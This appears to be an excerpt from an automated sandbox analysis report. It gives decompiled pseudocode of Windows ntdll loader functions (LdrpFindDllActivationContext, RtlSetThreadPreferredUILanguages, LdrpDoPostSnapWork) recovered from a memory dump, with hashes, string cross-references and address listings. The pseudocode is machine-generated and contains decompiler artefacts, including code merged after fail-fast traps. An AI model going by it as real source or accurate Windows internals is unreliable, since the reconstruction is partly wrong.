                                                                            • API String ID: 0-258546922
                                                                            • Opcode ID: ba8e56ab4d2a6cb88560ed4b1c80a3962531af4927bff988ea767b08324f6340
                                                                            • Instruction ID: c2b17831431e0bfa39af0513f58992605d2ed05084108f4ce3175b741de74a87
                                                                            • Opcode Fuzzy Hash: ba8e56ab4d2a6cb88560ed4b1c80a3962531af4927bff988ea767b08324f6340
                                                                            • Instruction Fuzzy Hash: 3CF15E72D10219EFCB16DF98C980AEEBBB9FF48A50F15406AE545EB250D7749E01CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 44%
E010E8E00(void* __ecx) {
	signed int _v8;
	char _v12;
	void* __ebx;
	void* __edi;
	void* __esi;
	intOrPtr* _t32;
	intOrPtr _t35;
	intOrPtr _t43;
	void* _t46;
	intOrPtr _t47;
	void* _t48;
	signed int _t49;
	void* _t50;
	intOrPtr* _t51;
	signed int _t52;
	void* _t53;
	intOrPtr _t55;

	_v8 = *0x11ad360 ^ _t52;
	_t49 = 0;
	_t48 = __ecx;
	_t55 = *0x11a8464; // 0x74e10110
	if(_t55 == 0) {
		L9:
		if( !_t49 >= 0) {
			if(( *0x11a5780 & 0x00000003) != 0) {
				E01135510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
			}
			if(( *0x11a5780 & 0x00000010) != 0) {
				asm("int3");
			}
		}
		return E010FB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
	}
	_t47 = *((intOrPtr*)(__ecx + 0x18));
	_t43 = *0x11a7984; // 0x5e2c80
	if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
		_t32 = *((intOrPtr*)(_t48 + 0x28));
		if(_t48 == _t43) {
			_t50 = 0x5c;
			if( *_t32 == _t50) {
				_t46 = 0x3f;
				if( *((intOrPtr*)(_t32 + 2)) == _t46 && *((intOrPtr*)(_t32 + 4)) == _t46 && *((intOrPtr*)(_t32 + 6)) == _t50 && *((intOrPtr*)(_t32 + 8)) != 0 && *((short*)(_t32 + 0xa)) == 0x3a && *((intOrPtr*)(_t32 + 0xc)) == _t50) {
					_t32 = _t32 + 8;
				}
			}
		}
		_t51 = *0x11a8464; // 0x74e10110
		*0x11ab1e0(_t47, _t32, &_v12);
		_t49 = *_t51();
		if(_t49 >= 0) {
			L8:
			_t35 = _v12;
			if(_t35 != 0) {
				if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
					E010E9B10( *((intOrPtr*)(_t48 + 0x48)));
					_t35 = _v12;
				}
				*((intOrPtr*)(_t48 + 0x48)) = _t35;
			}
			goto L9;
		}
		if(_t49 != 0xc000008a) {
			if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
				if(_t49 != 0xc00000bb) {
					goto L8;
				}
			}
		}
		if(( *0x11a5780 & 0x00000005) != 0) {
			_push(_t49);
			E01135510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
			_t53 = _t53 + 0x1c;
		}
		_t49 = 0;
		goto L8;
	} else {
		goto L9;
	}
}


                                                                            Strings
                                                                            • Querying the active activation context failed with status 0x%08lx , xrefs: 01129357
                                                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx , xrefs: 0112932A
                                                                            • minkernel\ntdll\ldrsnap.c , xrefs: 0112933B, 01129367
                                                                            • LdrpFindDllActivationContext , xrefs: 01129331, 0112935D
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                            • API String ID: 0-3779518884
                                                                            • Opcode ID: 85c4d6b807b07fc5bb1a3bae15e90e457a9c317465aa834da587211a47a747e4
                                                                            • Instruction ID: 8352014c59f4aa9ffd73e6a728855968e8fd09fb9e669915c9d316a5dc861039
                                                                            • Opcode Fuzzy Hash: 85c4d6b807b07fc5bb1a3bae15e90e457a9c317465aa834da587211a47a747e4
                                                                            • Instruction Fuzzy Hash: 35412932A043159FDFBAAA5EC84CA7ABAE5AB00358F46C1BBD9D457351E7706DC08381
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 80%
                                                                                                                                  E010EFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) { 				char _v5; 				signed int _v8; 				signed int _v12; 				char _v16; 				char _v17; 				char _v20; 				signed int _v24; 				char _v28; 				char _v32; 				signed int _v40; 				void* __ecx; 				void* __edi; 				void* __ebp; 				signed int _t73; 				intOrPtr* _t75; 				signed int _t77; 				signed int _t79; 				signed int _t81; 				intOrPtr _t83; 				intOrPtr _t85; 				intOrPtr _t86; 				signed int _t91; 				signed int _t94; 				signed int _t95; 				signed int _t96; 				signed int _t106; 				signed int _t108; 				signed int _t114; 				signed int _t116; 				signed int _t118; 				signed int _t122; 				signed int _t123; 				void* _t129; 				signed int _t130; 				void* _t132; 				intOrPtr* _t134; 				signed int _t138; 				signed int _t141; 				signed int _t147; 				intOrPtr _t153; 				signed int _t154; 				signed int _t155; 				signed int _t170; 				void* _t174; 				signed int _t176; 				signed int _t177;  				_t129 = __ebx; 				_push(_t132); 				_push(__esi); 				_t174 = _t132; 				_t73 =  !( *( *(_t174 + 0x18))); 				if(_t73 >= 0) { 					L5: 					return _t73; 				} else { 					E010CEEF0(0x11a7b60); 					_t134 =  *0x11a7b84; // 0x776f7b80 					_t2 = _t174 + 0x24; // 0x24 					_t75 = _t2; 					if( *_t134 != 0x11a7b80) { 						_push(3); 						asm("int 0x29"); 						asm("int3"); 						asm("int3"); 						asm("int3"); 						asm("int3"); 						asm("int3"); 						asm("int3"); 						asm("int3"); 						asm("int3"); 						asm("int3"); 						asm("int3"); 						asm("int3"); 						asm("int3"); 						asm("int3"); 						asm("int3"); 						asm("int3"); 						asm("int3"); 						asm("int3"); 						asm("int3"); 						asm("int3"); 						_push(0x11a7b60); 						_t170 = _v8; 						_v28 = 0; 						_v40 = 0; 						_v24 = 0; 						_v17 = 0; 						_v32 = 0; 						__eflags = _t170 & 0xffff7cf2; 						
if((_t170 & 0xffff7cf2) != 0) { 							L43: 							_t77 = 0xc000000d; 						} else { 							_t79 = _t170 & 0x0000000c; 							__eflags = _t79; 							if(_t79 != 0) { 								__eflags = _t79 - 0xc; 								if(_t79 == 0xc) { 									goto L43; 								} else { 									goto L9; 								} 							} else { 								_t170 = _t170 | 0x00000008; 								__eflags = _t170; 								L9: 								_t81 = _t170 & 0x00000300; 								__eflags = _t81 - 0x300; 								if(_t81 == 0x300) { 									goto L43; 								} else { 									_t138 = _t170 & 0x00000001; 									__eflags = _t138; 									_v24 = _t138; 									if(_t138 != 0) { 										__eflags = _t81; 										if(_t81 != 0) { 											goto L43; 										} else { 											goto L11; 										} 									} else { 										L11: 										_push(_t129); 										_t77 = E010C6D90( &_v20); 										_t130 = _t77; 										__eflags = _t130; 										if(_t130 >= 0) { 											_push(_t174); 											__eflags = _t170 & 0x00000301; 											if((_t170 & 0x00000301) == 0) { 												_t176 = _a8; 												__eflags = _t176; 												if(__eflags == 0) { 													L64: 													_t83 =  *[fs:0x18]; 													_t177 = 0; 													__eflags =  *(_t83 + 0xfb8); 													if( *(_t83 + 0xfb8) != 0) { 														E010C76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8))); 														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0; 													} 													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12; 													goto L15; 												} else { 													asm("sbb edx, edx"); 													_t114 = E01158938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags); 													__eflags = _t114; 													if(_t114 < 0) { 														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n"); 														E010BB150(); 													} 													_t116 = E01156D81(_t176,  &_v16); 													__eflags = _t116; 													
if(_t116 >= 0) { 														__eflags = _v16 - 2; 														if(_v16 < 2) { 															L56: 															_t118 = E010C75CE(_v20, 5, 0); 															__eflags = _t118; 															if(_t118 < 0) { 																L67: 																_t130 = 0xc0000017; 																goto L32; 															} else { 																__eflags = _v12; 																if(_v12 == 0) { 																	goto L67; 																} else { 																	_t153 =  *0x11a8638; // 0x5ee928 																	_t122 = L010C38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12); 																	_t154 = _v12; 																	_t130 = _t122; 																	__eflags = _t130; 																	if(_t130 >= 0) { 																		_t123 =  *(_t154 + 4) & 0x0000ffff; 																		__eflags = _t123; 																		if(_t123 != 0) { 																			_t155 = _a12; 																			__eflags = _t155; 																			if(_t155 != 0) { 																				 *_t155 = _t123; 																			} 																			goto L64; 																		} else { 																			E010C76E2(_t154); 																			goto L41; 																		} 																	} else { 																		E010C76E2(_t154); 																		_t177 = 0; 																		goto L18; 																	} 																} 															} 														} else { 															__eflags =  *_t176; 															if( *_t176 != 0) { 																goto L56; 															} else { 																__eflags =  *(_t176 + 2); 																if( *(_t176 + 2) == 0) { 																	goto L64; 																} else { 																	goto L56; 																} 															} 														} 													} else { 														_t130 = 0xc000000d; 														goto L32; 													} 												} 												goto L35; 											} else { 												__eflags = _a8; 												if(_a8 != 0) { 													_t77 = 0xc000000d; 												} else { 													_v5 = 1; 													L010EFCE3(_v20, _t170); 													
_t177 = 0; 													__eflags = 0; 													L15: 													_t85 =  *[fs:0x18]; 													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177; 													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) { 														L18: 														__eflags = _t130; 														if(_t130 != 0) { 															goto L32; 														} else { 															__eflags = _v5 - _t130; 															if(_v5 == _t130) { 																goto L32; 															} else { 																_t86 =  *[fs:0x18]; 																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177; 																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) { 																	_t177 =  *( *( *[fs:0x18] + 0xfbc)); 																} 																__eflags = _t177; 																if(_t177 == 0) { 																	L31: 																	__eflags = 0; 																	L010C70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28); 																	goto L32; 																} else { 																	__eflags = _v24; 																	_t91 =  *(_t177 + 0x20); 																	if(_v24 != 0) { 																		 *(_t177 + 0x20) = _t91 & 0xfffffff9; 																		goto L31; 																	} else { 																		_t141 = _t91 & 0x00000040; 																		__eflags = _t170 & 0x00000100; 																		if((_t170 & 0x00000100) == 0) { 																			__eflags = _t141; 																			if(_t141 == 0) { 																				L74: 																				_t94 = _t91 & 0xfffffffd | 0x00000004; 																				goto L27; 																			} else { 																				_t177 = E010EFD22(_t177); 																				__eflags = _t177; 																				if(_t177 == 0) { 																					goto L42; 																				} else { 																					_t130 = E010EFD9B(_t177, 0, 4); 																					__eflags = _t130; 																					if(_t130 != 0) { 																						goto L42; 																					} else { 																						_t68 = _t177 + 0x20; 																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf; 							
															__eflags =  *_t68; 																						_t91 =  *(_t177 + 0x20); 																						goto L74; 																					} 																				} 																			} 																			goto L35; 																		} else { 																			__eflags = _t141; 																			if(_t141 != 0) { 																				_t177 = E010EFD22(_t177); 																				__eflags = _t177; 																				if(_t177 == 0) { 																					L42: 																					_t77 = 0xc0000001; 																					goto L33; 																				} else { 																					_t130 = E010EFD9B(_t177, 0, 4); 																					__eflags = _t130; 																					if(_t130 != 0) { 																						goto L42; 																					} else { 																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf; 																						_t91 =  *(_t177 + 0x20); 																						goto L26; 																					} 																				} 																				goto L35; 																			} else { 																				L26: 																				_t94 = _t91 & 0xfffffffb | 0x00000002; 																				__eflags = _t94; 																				L27: 																				 *(_t177 + 0x20) = _t94; 																				__eflags = _t170 & 0x00008000; 																				if((_t170 & 0x00008000) != 0) { 																					_t95 = _a12; 																					__eflags = _t95; 																					if(_t95 != 0) { 																						_t96 =  *_t95; 																						__eflags = _t96; 																						if(_t96 != 0) { 																							 *((short*)(_t177 + 0x22)) = 0; 																							_t40 = _t177 + 0x20; 																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010; 																							__eflags =  *_t40; 																						} 																					} 																				} 																				goto L31; 																			} 																		} 																	} 																} 															} 														} 													} else { 														_t147 =  *( *[fs:0x18] 
+ 0xfc0); 														_t106 =  *(_t147 + 0x20); 														__eflags = _t106 & 0x00000040; 														if((_t106 & 0x00000040) != 0) { 															_t147 = E010EFD22(_t147); 															__eflags = _t147; 															if(_t147 == 0) { 																L41: 																_t130 = 0xc0000001; 																L32: 																_t77 = _t130; 																goto L33; 															} else { 																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf; 																_t106 =  *(_t147 + 0x20); 																goto L17; 															} 															goto L35; 														} else { 															L17: 															_t108 = _t106 | 0x00000080; 															__eflags = _t108; 															 *(_t147 + 0x20) = _t108; 															 *( *[fs:0x18] + 0xfc0) = _t147; 															goto L18; 														} 													} 												} 											} 											L33: 										} 									} 								} 							} 						} 						L35: 						return _t77; 					} else { 						 *_t75 = 0x11a7b80; 						 *((intOrPtr*)(_t75 + 4)) = _t134; 						 *_t134 = _t75; 						 *0x11a7b84 = _t75; 						_t73 = E010CEB70(_t134, 0x11a7b60); 						if( *0x11a7b20 != 0) { 							_t73 =  *( *[fs:0x30] + 0xc); 							if( *((char*)(_t73 + 0x28)) == 0) { 								_t73 = E010CFF60( *0x11a7b20); 							} 						} 						goto L5; 					} 				} 			}                        

                                                                            0x0112bde1
                                                                            0x00000000
                                                                            0x0112bde3
                                                                            0x00000000
                                                                            0x0112bde3
                                                                            0x010efb86
                                                                            0x010efb86
                                                                            0x010efb86
                                                                            0x010efb8b
                                                                            0x010efb90
                                                                            0x010efb92
                                                                            0x010efb94
                                                                            0x010efb9a
                                                                            0x010efb9b
                                                                            0x010efba1
                                                                            0x0112bde8
                                                                            0x0112bdeb
                                                                            0x0112bded
                                                                            0x0112beb5
                                                                            0x0112beb5
                                                                            0x0112bebb
                                                                            0x0112bebd
                                                                            0x0112bec3
                                                                            0x0112bed2
                                                                            0x0112bedd
                                                                            0x0112bedd
                                                                            0x0112beed
                                                                            0x00000000
                                                                            0x0112bdf3
                                                                            0x0112bdfe
                                                                            0x0112be06
                                                                            0x0112be0b
                                                                            0x0112be0d
                                                                            0x0112be0f
                                                                            0x0112be14
                                                                            0x0112be19
                                                                            0x0112be20
                                                                            0x0112be25
                                                                            0x0112be27
                                                                            0x0112be35
                                                                            0x0112be39
                                                                            0x0112be46
                                                                            0x0112be4f
                                                                            0x0112be54
                                                                            0x0112be56
                                                                            0x0112bef8
                                                                            0x0112bef8
                                                                            0x00000000
                                                                            0x0112be5c
                                                                            0x0112be5c
                                                                            0x0112be60
                                                                            0x00000000
                                                                            0x0112be66
                                                                            0x0112be66
                                                                            0x0112be7f
                                                                            0x0112be84
                                                                            0x0112be87
                                                                            0x0112be89
                                                                            0x0112be8b
                                                                            0x0112be99
                                                                            0x0112be9d
                                                                            0x0112bea0
                                                                            0x0112beac
                                                                            0x0112beaf
                                                                            0x0112beb1
                                                                            0x0112beb3
                                                                            0x0112beb3
                                                                            0x00000000
                                                                            0x0112bea2
                                                                            0x0112bea2
                                                                            0x00000000
                                                                            0x0112bea2
                                                                            0x0112be8d
                                                                            0x0112be8d
                                                                            0x0112be92
                                                                            0x00000000
                                                                            0x0112be92
                                                                            0x0112be8b
                                                                            0x0112be60
                                                                            0x0112be3b
                                                                            0x0112be3b
                                                                            0x0112be3e
                                                                            0x00000000
                                                                            0x0112be40
                                                                            0x0112be40
                                                                            0x0112be44
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0112be44
                                                                            0x0112be3e
                                                                            0x0112be29
                                                                            0x0112be29
                                                                            0x00000000
                                                                            0x0112be29
                                                                            0x0112be27
                                                                            0x00000000
                                                                            0x010efba7
                                                                            0x010efba7
                                                                            0x010efbab
                                                                            0x0112bf02
                                                                            0x010efbb1
                                                                            0x010efbb1
                                                                            0x010efbb8
                                                                            0x010efbbd
                                                                            0x010efbbd
                                                                            0x010efbbf
                                                                            0x010efbbf
                                                                            0x010efbc5
                                                                            0x010efbcb
                                                                            0x010efbf8
                                                                            0x010efbf8
                                                                            0x010efbfa
                                                                            0x00000000
                                                                            0x010efc00
                                                                            0x010efc00
                                                                            0x010efc03
                                                                            0x00000000
                                                                            0x010efc09
                                                                            0x010efc09
                                                                            0x010efc0f
                                                                            0x010efc15
                                                                            0x010efc23
                                                                            0x010efc23
                                                                            0x010efc25
                                                                            0x010efc27
                                                                            0x010efc75
                                                                            0x010efc7c
                                                                            0x010efc84
                                                                            0x00000000
                                                                            0x010efc29
                                                                            0x010efc29
                                                                            0x010efc2d
                                                                            0x010efc30
                                                                            0x0112bf0f
                                                                            0x00000000
                                                                            0x010efc36
                                                                            0x010efc38
                                                                            0x010efc3b
                                                                            0x010efc41
                                                                            0x0112bf17
                                                                            0x0112bf19
                                                                            0x0112bf48
                                                                            0x0112bf4b
                                                                            0x00000000
                                                                            0x0112bf1b
                                                                            0x0112bf22
                                                                            0x0112bf24
                                                                            0x0112bf26
                                                                            0x00000000
                                                                            0x0112bf2c
                                                                            0x0112bf37
                                                                            0x0112bf39
                                                                            0x0112bf3b
                                                                            0x00000000
                                                                            0x0112bf41
                                                                            0x0112bf41
                                                                            0x0112bf41
                                                                            0x0112bf41
                                                                            0x0112bf45
                                                                            0x00000000
                                                                            0x0112bf45
                                                                            0x0112bf3b
                                                                            0x0112bf26
                                                                            0x00000000
                                                                            0x010efc47
                                                                            0x010efc47
                                                                            0x010efc49
                                                                            0x010efcb2
                                                                            0x010efcb4
                                                                            0x010efcb6
                                                                            0x010efcdc
                                                                            0x010efcdc
                                                                            0x00000000
                                                                            0x010efcb8
                                                                            0x010efcc3
                                                                            0x010efcc5
                                                                            0x010efcc7
                                                                            0x00000000
                                                                            0x010efcc9
                                                                            0x010efcc9
                                                                            0x010efccd
                                                                            0x00000000
                                                                            0x010efccd
                                                                            0x010efcc7
                                                                            0x00000000
                                                                            0x010efc4b
                                                                            0x010efc4b
                                                                            0x010efc4e
                                                                            0x010efc4e
                                                                            0x010efc51
                                                                            0x010efc51
                                                                            0x010efc54
                                                                            0x010efc5a
                                                                            0x010efc5c
                                                                            0x010efc5f
                                                                            0x010efc61
                                                                            0x010efc63
                                                                            0x010efc65
                                                                            0x010efc67
                                                                            0x010efc6e
                                                                            0x010efc72
                                                                            0x010efc72
                                                                            0x010efc72
                                                                            0x010efc72
                                                                            0x010efc67
                                                                            0x010efc61
                                                                            0x00000000
                                                                            0x010efc5a
                                                                            0x010efc49
                                                                            0x010efc41
                                                                            0x010efc30
                                                                            0x010efc27
                                                                            0x010efc03
                                                                            0x010efbcd
                                                                            0x010efbd3
                                                                            0x010efbd9
                                                                            0x010efbdc
                                                                            0x010efbde
                                                                            0x010efc99
                                                                            0x010efc9b
                                                                            0x010efc9d
                                                                            0x010efcd5
                                                                            0x010efcd5
                                                                            0x010efc89
                                                                            0x010efc89
                                                                            0x00000000
                                                                            0x010efc9f
                                                                            0x010efc9f
                                                                            0x010efca3
                                                                            0x00000000
                                                                            0x010efca3
                                                                            0x00000000
                                                                            0x010efbe4
                                                                            0x010efbe4
                                                                            0x010efbe4
                                                                            0x010efbe4
                                                                            0x010efbe9
                                                                            0x010efbf2
                                                                            0x00000000
                                                                            0x010efbf2
                                                                            0x010efbde
                                                                            0x010efbcb
                                                                            0x010efbab
                                                                            0x010efc8b
                                                                            0x010efc8b
                                                                            0x010efc8c
                                                                            0x010efb80
                                                                            0x010efb72
                                                                            0x010efb5e
                                                                            0x010efc8d
                                                                            0x010efc91
                                                                            0x010efadf
                                                                            0x010efadf
                                                                            0x010efae1
                                                                            0x010efae4
                                                                            0x010efae7
                                                                            0x010efaec
                                                                            0x010efaf8
                                                                            0x010efb00
                                                                            0x010efb07
                                                                            0x010efb0f
                                                                            0x010efb0f
                                                                            0x010efb07
                                                                            0x00000000
                                                                            0x010efaf8
                                                                            0x010efadd

                                                                            Strings
                                                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string! , xrefs: 0112BE0F
                                                                            • `3^ , xrefs: 010EFAF1
                                                                            • (^ , xrefs: 0112BE66
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (^$*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!$`3^
                                                                            • API String ID: 0-998226430
                                                                            • Opcode ID: 636dc3ef743ae91ebec792623df1b090fab92b3c3be5f414cc2170fd6d969282
                                                                            • Instruction ID: 1bd7925e9e67df613e5db5a0303cb181b294c9eda2c01934b9ac140638577c3a
                                                                            • Opcode Fuzzy Hash: 636dc3ef743ae91ebec792623df1b090fab92b3c3be5f414cc2170fd6d969282
                                                                            • Instruction Fuzzy Hash: 06A13671B0061B8FEB29DB6AC454BBEB7E5AF44710F14457DDA86CB680EB30D841CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 83%
                                                                                                                                  E010C8794(void* __ecx) { 				signed int _v0; 				char _v8; 				signed int _v12; 				void* _v16; 				signed int _v20; 				intOrPtr _v24; 				signed int _v28; 				signed int _v32; 				signed int _v40; 				void* __ebx; 				void* __edi; 				void* __esi; 				void* __ebp; 				intOrPtr* _t77; 				signed int _t80; 				signed char _t81; 				signed int _t87; 				signed int _t91; 				void* _t92; 				void* _t94; 				signed int _t95; 				signed int _t103; 				signed int _t105; 				signed int _t110; 				signed int _t118; 				intOrPtr* _t121; 				intOrPtr _t122; 				signed int _t125; 				signed int _t129; 				signed int _t131; 				signed int _t134; 				signed int _t136; 				signed int _t143; 				signed int* _t147; 				signed int _t151; 				void* _t153; 				signed int* _t157; 				signed int _t159; 				signed int _t161; 				signed int _t166; 				signed int _t168;  				_push(__ecx); 				_t153 = __ecx; 				_t159 = 0; 				_t121 = __ecx + 0x3c; 				if( *_t121 == 0) { 					L2: 					_t77 =  *((intOrPtr*)(_t153 + 0x58)); 					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) { 						_t122 =  *((intOrPtr*)(_t153 + 0x20)); 						_t180 =  *((intOrPtr*)(_t122 + 0x3a)); 						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) { 							L6: 							if(E010C934A() != 0) { 								_t159 = E0113A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0); 								__eflags = _t159; 								if(_t159 < 0) { 									_t81 =  *0x11a5780; // 0x0 									__eflags = _t81 & 0x00000003; 									if((_t81 & 0x00000003) != 0) { 										_push(_t159); 										E01135510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18))); 										_t81 =  *0x11a5780; // 0x0 									} 									
__eflags = _t81 & 0x00000010; 									if((_t81 & 0x00000010) != 0) { 										asm("int3"); 									} 								} 							} 						} else { 							_t159 = E010C849B(0, _t122, _t153, _t159, _t180); 							if(_t159 >= 0) { 								goto L6; 							} 						} 						_t80 = _t159; 						goto L8; 					} else { 						_t125 = 0x13; 						asm("int 0x29"); 						_push(0); 						_push(_t159); 						_t161 = _t125; 						_t87 =  *( *[fs:0x30] + 0x1e8); 						_t143 = 0; 						_v40 = _t161; 						_t118 = 0; 						_push(_t153); 						__eflags = _t87; 						if(_t87 != 0) { 							_t118 = _t87 + 0x5d8; 							__eflags = _t118; 							if(_t118 == 0) { 								L46: 								_t118 = 0; 							} else { 								__eflags =  *(_t118 + 0x30); 								if( *(_t118 + 0x30) == 0) { 									goto L46; 								} 							} 						} 						_v32 = 0; 						_v28 = 0; 						_v16 = 0; 						_v20 = 0; 						_v12 = 0; 						__eflags = _t118; 						if(_t118 != 0) { 							__eflags = _t161; 							if(_t161 != 0) { 								__eflags =  *(_t118 + 8); 								if( *(_t118 + 8) == 0) { 									L22: 									_t143 = 1; 									__eflags = 1; 								} else { 									_t19 = _t118 + 0x40; // 0x40 									_t156 = _t19; 									E010C8999(_t19,  &_v16); 									__eflags = _v0; 									if(_v0 != 0) { 										__eflags = _v0 - 1; 										if(_v0 != 1) { 											goto L22; 										} else { 											_t128 =  *(_t161 + 0x64); 											__eflags =  *(_t161 + 0x64); 											if( *(_t161 + 0x64) == 0) { 												goto L22; 											} else { 												E010C8999(_t128,  &_v12); 												_t147 = _v12; 												_t91 = 0; 												__eflags = 0; 												_t129 =  *_t147; 												while(1) { 													__eflags =  *((intOrPtr*)(0x11a5c60 + _t91 * 8)) - _t129; 													if( *((intOrPtr*)(0x11a5c60 + _t91 * 8)) == _t129) { 														break; 													} 													_t91 = _t91 + 1; 													__eflags = _t91 - 5; 													if(_t91 < 5) { 														continue; 													} else { 							
							_t131 = 0; 														__eflags = 0; 													} 													L37: 													__eflags = _t131; 													if(_t131 != 0) { 														goto L22; 													} else { 														__eflags = _v16 - _t147; 														if(_v16 != _t147) { 															goto L22; 														} else { 															E010D2280(_t92, 0x11a86cc); 															_t94 = E01189DFB( &_v20); 															__eflags = _t94 - 1; 															if(_t94 != 1) { 															} 															asm("movsd"); 															asm("movsd"); 															asm("movsd"); 															asm("movsd"); 															 *_t118 =  *_t118 + 1; 															asm("adc dword [ebx+0x4], 0x0"); 															_t95 = E010E61A0( &_v32); 															__eflags = _t95; 															if(_t95 != 0) { 																__eflags = _v32 | _v28; 																if((_v32 | _v28) != 0) { 																	_t71 = _t118 + 0x40; // 0x3f 																	_t134 = _t71; 																	goto L55; 																} 															} 															goto L30; 														} 													} 													goto L56; 												} 												_t92 = 0x11a5c64 + _t91 * 8; 												asm("lock xadd [eax], ecx"); 												_t131 = (_t129 | 0xffffffff) - 1; 												goto L37; 											} 										} 										goto L56; 									} else { 										_t143 = E010C8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12); 										__eflags = _t143; 										if(_t143 != 0) { 											_t157 = _v12; 											_t103 = 0; 											__eflags = 0; 											_t136 =  &(_t157[1]); 											 *(_t161 + 0x64) = _t136; 											_t151 =  *_t157; 											_v20 = _t136; 											while(1) { 												__eflags =  *((intOrPtr*)(0x11a5c60 + _t103 * 8)) - _t151; 												if( *((intOrPtr*)(0x11a5c60 + _t103 * 8)) == _t151) { 													break; 												} 												_t103 = _t103 + 1; 												__eflags = _t103 - 5; 												if(_t103 < 5) { 													continue; 												} 												L21: 												_t105 = 
E010FF380(_t136, 0x1091184, 0x10); 												__eflags = _t105; 												if(_t105 != 0) { 													__eflags =  *_t157 -  *_v16; 													if( *_t157 >=  *_v16) { 														goto L22; 													} else { 														asm("cdq"); 														_t166 = _t157[5] & 0x0000ffff; 														_t108 = _t157[5] & 0x0000ffff; 														asm("cdq"); 														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff; 														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c)); 														if(__eflags > 0) { 															L29: 															E010D2280(_t108, 0x11a86cc); 															 *_t118 =  *_t118 + 1; 															_t42 = _t118 + 0x40; // 0x3f 															_t156 = _t42; 															asm("adc dword [ebx+0x4], 0x0"); 															asm("movsd"); 															asm("movsd"); 															asm("movsd"); 															asm("movsd"); 															_t110 = E010E61A0( &_v32); 															__eflags = _t110; 															if(_t110 != 0) { 																__eflags = _v32 | _v28; 																if((_v32 | _v28) != 0) { 																	_t134 = _v20; 																	L55: 																	E01189D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28))); 																} 															} 															L30: 															 *_t118 =  *_t118 + 1; 															asm("adc dword [ebx+0x4], 0x0"); 															E010CFFB0(_t118, _t156, 0x11a86cc); 															goto L22; 														} else { 															if(__eflags < 0) { 																goto L22; 															} else { 																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28)); 																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) { 																	goto L22; 																} else { 																	goto L29; 																} 															} 														} 													} 													goto L56; 												} 												goto L22; 											} 											asm("lock inc dword [eax]"); 											goto L21; 										} 			
						} 								} 							} 						} 						return _t143; 					} 				} else { 					_push( &_v8); 					_push( *((intOrPtr*)(__ecx + 0x50))); 					_push(__ecx + 0x40); 					_push(_t121); 					_push(0xffffffff); 					_t80 = E010F9A00(); 					_t159 = _t80; 					if(_t159 < 0) { 						L8: 						return _t80; 					} else { 						goto L2; 					} 				} 				L56: 			}                        

                                                                            Strings
